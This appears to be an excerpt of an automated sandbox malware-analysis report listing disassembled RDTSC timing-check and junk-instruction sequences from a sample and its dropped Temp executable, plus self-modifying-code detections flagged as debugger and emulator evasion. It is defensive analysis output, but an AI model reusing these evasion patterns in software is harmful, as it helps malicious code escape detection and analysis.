Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0CBB second address: 4AA0D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007F36B8869C08h 0x00000014 jmp 00007F36B8869C05h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0D0C second address: 4AA0D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0D47 second address: 4AA0D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 4AA0DE5 second address: 4AA0DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: DBEB10 second address: DBEB1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F42AD8 second address: F42AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F36B8D8D086h 0x0000000a popad 0x0000000b jc 00007F36B8D8D08Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F42C32 second address: F42C38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F43067 second address: F4306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F4306B second address: F4308F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F36B8869BFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F4308F second address: F430B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F36B8D8D097h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430B0 second address: F430B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430B6 second address: F430BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430BC second address: F430C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430C5 second address: F430CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430CB second address: F430CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F430CF second address: F430E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F36B8D8D086h 0x0000000d jne 00007F36B8D8D086h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F43213 second address: F43233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F36B8869C03h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F43233 second address: F43239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F4563B second address: F45645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F45645 second address: F456BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F36B8D8D095h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F36B8D8D088h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D358Dh] 0x0000002f push 00000000h 0x00000031 mov edx, dword ptr [ebp+122D1DF3h] 0x00000037 jmp 00007F36B8D8D096h 0x0000003c push 6D55BBB6h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F36B8D8D08Dh 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F456BF second address: F45769 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F36B8869BF6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 6D55BB36h 0x00000013 mov dword ptr [ebp+122D1E2Fh], esi 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D396Fh] 0x00000021 push 00000000h 0x00000023 clc 0x00000024 push 00000003h 0x00000026 jmp 00007F36B8869C03h 0x0000002b jbe 00007F36B8869BFCh 0x00000031 mov dword ptr [ebp+122D27B5h], ebx 0x00000037 call 00007F36B8869BF9h 0x0000003c push esi 0x0000003d jg 00007F36B8869BF8h 0x00000043 pop esi 0x00000044 push eax 0x00000045 jp 00007F36B8869C0Ah 0x0000004b jmp 00007F36B8869C04h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 jmp 00007F36B8869C04h 0x00000059 mov eax, dword ptr [eax] 0x0000005b jmp 00007F36B8869C03h 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 pushad 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F45769 second address: F457F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36B8D8D090h 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F36B8D8D088h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F36B8D8D090h 0x0000002b jmp 00007F36B8D8D08Fh 0x00000030 pop esi 0x00000031 lea ebx, dword ptr [ebp+1245A190h] 0x00000037 xor si, 68C0h 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jmp 00007F36B8D8D08Fh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F36B8D8D094h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F457F7 second address: F45815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F36B8869C04h 0x00000010 jmp 00007F36B8869BFEh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6346D second address: F63471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63471 second address: F63494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63494 second address: F63498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63498 second address: F634B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F36B8869BF6h 0x00000008 jmp 00007F36B8869C01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F634B3 second address: F634B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F639AF second address: F639B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63DF4 second address: F63E0C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D08Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F36B8D8D086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63E0C second address: F63E12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F63FA0 second address: F63FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6423F second address: F64264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36B8869BF6h 0x0000000a jng 00007F36B8869BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8869C02h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F64264 second address: F64268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F64268 second address: F6426E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F643DA second address: F6440D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F36B8D8D086h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F36B8D8D090h 0x00000018 jbe 00007F36B8D8D086h 0x0000001e popad 0x0000001f push edx 0x00000020 jg 00007F36B8D8D086h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6440D second address: F64431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F36B8869C03h 0x0000000a popad 0x0000000b jl 00007F36B8869C00h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F5CA9F second address: F5CAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F64571 second address: F6457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36B8869BF6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F64E7E second address: F64E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F64E84 second address: F64E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6C887 second address: F6C88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6C918 second address: F6C930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F6DC43 second address: F6DC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F36B8D8D086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F355C6 second address: F35644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869BFAh 0x00000009 pop esi 0x0000000a jmp 00007F36B8869BFAh 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 jmp 00007F36B8869BFCh 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F36B8869C05h 0x00000020 jmp 00007F36B8869C01h 0x00000025 jl 00007F36B8869BF6h 0x0000002b push edi 0x0000002c pop edi 0x0000002d popad 0x0000002e jmp 00007F36B8869C09h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 ja 00007F36B8869BF6h 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F7288A second address: F7288E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F7288E second address: F728C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8869BF6h 0x00000008 jmp 00007F36B8869C03h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F36B8869C02h 0x00000015 jbe 00007F36B8869BF6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74D63 second address: F74D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74D67 second address: F74D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F36B8869BFCh 0x00000012 jns 00007F36B8869BF6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74E2F second address: F74E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F36B8D8D08Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8D8D096h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74E5D second address: F74E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74E63 second address: F74E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F74E82 second address: F74E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F75935 second address: F75939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F75939 second address: F7593D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F7599F second address: F759A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F75A99 second address: F75A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F75BA3 second address: F75BCB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F36B8D8D099h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F75F2A second address: F75F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F76051 second address: F7609C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8D8D088h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F36B8D8D088h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+12454E57h], esi 0x0000002f xor di, 0664h 0x00000034 push eax 0x00000035 je 00007F36B8D8D090h 0x0000003b pushad 0x0000003c push edi 0x0000003d pop edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F76670 second address: F76676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F76676 second address: F7667A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F7667A second address: F766CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D3596h], esi 0x00000011 push 00000000h 0x00000013 sub edi, 79C1F6FAh 0x00000019 mov edi, dword ptr [ebp+122D3670h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F36B8869BF8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov esi, dword ptr [ebp+122D36DFh] 0x00000041 xchg eax, ebx 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F766CB second address: F766CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F766CF second address: F766E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F36B8869BFFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F7708C second address: F770F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F36B8D8D086h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F36B8D8D088h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D27B5h], esi 0x0000002d mov dword ptr [ebp+122D27F1h], esi 0x00000033 push 00000000h 0x00000035 or dword ptr [ebp+122D3596h], eax 0x0000003b push 00000000h 0x0000003d jmp 00007F36B8D8D08Ch 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F36B8D8D098h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F78219 second address: F782D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F36B8869C02h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F36B8869BF8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 or edi, dword ptr [ebp+122D2B78h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F36B8869BF8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov si, di 0x0000004d push 00000000h 0x0000004f call 00007F36B8869C07h 0x00000054 pushad 0x00000055 mov di, 296Eh 0x00000059 popad 0x0000005a pop edi 0x0000005b xchg eax, ebx 0x0000005c jg 00007F36B8869C0Eh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jbe 00007F36B8869BF6h 0x0000006c jmp 00007F36B8869C01h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	RDTSC instruction interceptor: First address: F77969 second address: F77976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F36B8D8D08Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Special instruction interceptor: First address: DE8C8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Special instruction interceptor: First address: F9089D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Special instruction interceptor: First address: F90520 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Special instruction interceptor: First address: F9AD07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Special instruction interceptor: First address: 1018BA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Special instruction interceptor: First address: DBEB68 instructions caused by: Self-modifying code
